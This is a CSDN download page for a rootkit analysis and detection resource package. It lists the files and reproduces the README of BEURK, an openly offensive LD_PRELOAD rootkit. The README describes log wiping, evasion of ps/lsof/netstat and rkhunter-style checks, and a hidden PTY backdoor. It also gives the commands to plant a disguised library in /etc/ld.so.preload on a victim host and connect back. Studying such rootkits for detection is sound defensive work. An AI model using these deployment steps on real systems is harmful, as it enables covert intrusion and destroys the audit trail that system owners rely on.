wazuh安装、Rootkit原理解析与检测实践资源-CSDN文库

共104个文件

c：47个

sh：18个

h：7个

27 浏览量 2023-08-20 09:23:40 上传评论收藏 86KB ZIP 举报

资源推荐

资源详情

资源评论

收起资源包目录

wazuh安装、Rootkit原理解析与检测实践（104个子文件）

drop_shell_backdoor.c 7KB

init.c 3KB

debug.c 3KB

is_hidden_file.c 2KB

cleanup_login_records.c 2KB

hide_tcp_ports.c 2KB

open.c 2KB

hide_tcp_ports.c 2KB

is_attacker.c 1KB

readdir64.c 1KB

fopen64.c 1KB

fopen.c 1KB

__xstat64.c 1KB

__xstat.c 1KB

readdir.c 1KB

__lxstat64.c 1KB

__lxstat.c 1KB

is_procnet.c 1KB

stat64.c 1KB

accept.c 1KB

unlinkat.c 1KB

lstat64.c 1KB

stat.c 1KB

link.c 1KB

lstat.c 1KB

open.c 1KB

access.c 1KB

unlink.c 1KB

rmdir.c 1KB

is_hidden_file.c 982B

drop_shell_backdoor.c 975B

main.c 882B

is_procnet.c 521B

is_attacker.c 397B

accept.c 392B

open.c 334B

cleanup_login_records.c 193B

lstat.c 131B

stat.c 130B

readdir.c 126B

test.c 113B

unlinkat.c 68B

fopen.c 67B

link.c 64B

access.c 63B

unlink.c 59B

rmdir.c 59B

commit-msg 58B

beurk.conf 2KB

Makefile.dep 3KB

.gitignore 104B

.gitkeep 0B

.gitmodules 93B

config.h 4KB

hooks.h 2KB

beurk.h 2KB

beurk.h 1KB

debug.h 1KB

tests.h 699B

LICENSE 34KB

Makefile 4KB

Makefile 739B

README.md 3KB

README.md 1KB

CONTRIBUTING.md 1KB

TODO.md 900B

README.md 197B

run.py 5KB

client.py 4KB

commit-msg.py 4KB

coverage.py 2KB

internal_hooks_calls.py 2KB

check_gplv3_headers.py 1KB

reconfigure 11KB

run.sh 2KB

run-tests.sh 1KB

run.sh 1KB

makefile.sh 1KB

client.sh 1KB

jenkins-tests.sh 542B

check_commits_history.sh 376B

deploy_git_hooks.sh 176B

socat-client.sh 162B

lsof.sh 0B

ps.sh 0B

ldd.sh 0B

lynis.sh 0B

rkhunter.sh 0B

ossec.sh 0B

chkrootkit.sh 0B

tiger.sh 0B

utmp.test 175B

files.test 153B

proc-net-tcp-with-hidden_port.txt 873B

共 104 条

BEURK ===== [Getting Started] | [API Documentation] | [Contributing] | [TODO List] [![Travis Build][Travis badge]](https://travis-ci.org/unix-thrust/beurk) [![Ready Issues][Waffle badge]](https://waffle.io/unix-thrust/beurk) [![Coverage Status][Cover badge]](https://coveralls.io/r/unix-thrust/beurk) [![Jenkins Build][Jenkins badge]](http://ci.zgun-family.eu/job/BEURK/) [![Join the chat at https://gitter.im/unix-thrust/beurk](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/unix-thrust/beurk) **BEURK** is an userland [preload rootkit] for GNU/Linux, heavily focused around anti-debugging and anti-detection. > _**S'ils savaient, ils vomiraient ...**_ > > *- The core team -* ------------------------------------------------------------------------------- ### Features ### - Hide attacker files and directories - Realtime log cleanup (on [utmp/wtmp]) - Anti process and login detection - Bypass unhide, lsof, ps, ldd, netstat analysis - Furtive PTY backdoor client ### Upcoming features ### - [ptrace(2)] hooking for anti-debugging - [libpcap] hooking undermines local sniffers - PAM backdoor for *local privilege escalation* ### Usage ### * **Compile** ```sh git clone https://github.com/unix-thrust/beurk.git cd beurk make ``` * **Install** ```sh scp libselinux.so [email protected]:/lib/ ssh [email protected] 'echo /lib/libselinux.so >> /etc/ld.so.preload' ``` * **Enjoy !** ```sh ./client.py victim_ip:port # connect with furtive backdoor ``` ### Dependencies ### The following packages are not required in order to build BEURK at the moment: * **libpcap** - to avoid local sniffing * **libpam** - for local PAM backdoor * **libssl** - for encrypted backdoor connection **Example on debian:** ```sh apt-get install libpcap-dev libpam-dev libssl-dev ``` ------------------------------------------------------------------------------- [![Waffle metrics][Waffle metrics]](https://waffle.io/unix-thrust/beurk/metrics) * _**BEURK v 1.0 is in active development,**_ _**please checkout current [development branch].**_ > NOTE: **BEURK** is a recursive acronym for > **B**EURK **E**xperimental **U**nix **R**oot **K**it ------------------------------------------------------------------------------- [Getting Started]: https://github.com/unix-thrust/beurk/wiki [API Documentation]: https://github.com/unix-thrust/beurk/wiki/API-Documentation [TODO List]: https://github.com/unix-thrust/beurk/blob/master/TODO.md [Contributing]: https://github.com/unix-thrust/beurk/blob/master/CONTRIBUTING.md [Travis badge]: https://travis-ci.org/unix-thrust/beurk.svg?branch=master [Waffle badge]: https://badge.waffle.io/unix-thrust/beurk.svg?label=Ready&title=Ready-Issues [Cover badge]: https://img.shields.io/coveralls/unix-thrust/beurk.svg [Jenkins badge]: http://ci.zgun-family.eu/job/BEURK/badge/icon [Waffle metrics]: https://graphs.waffle.io/unix-thrust/beurk/throughput.svg [preload rootkit]: http://volatility-labs.blogspot.fr/2012/09/movp-24-analyzing-jynx-rootkit-and.html [utmp/wtmp]: http://man7.org/linux/man-pages/man5/utmp.5.html [ptrace(2)]: http://man7.org/linux/man-pages/man2/ptrace.2.html [libpcap]: http://en.wikipedia.org/wiki/Pcap#libpcap [development branch]: https://github.com/unix-thrust/beurk/tree/dev

评论收藏

内容反馈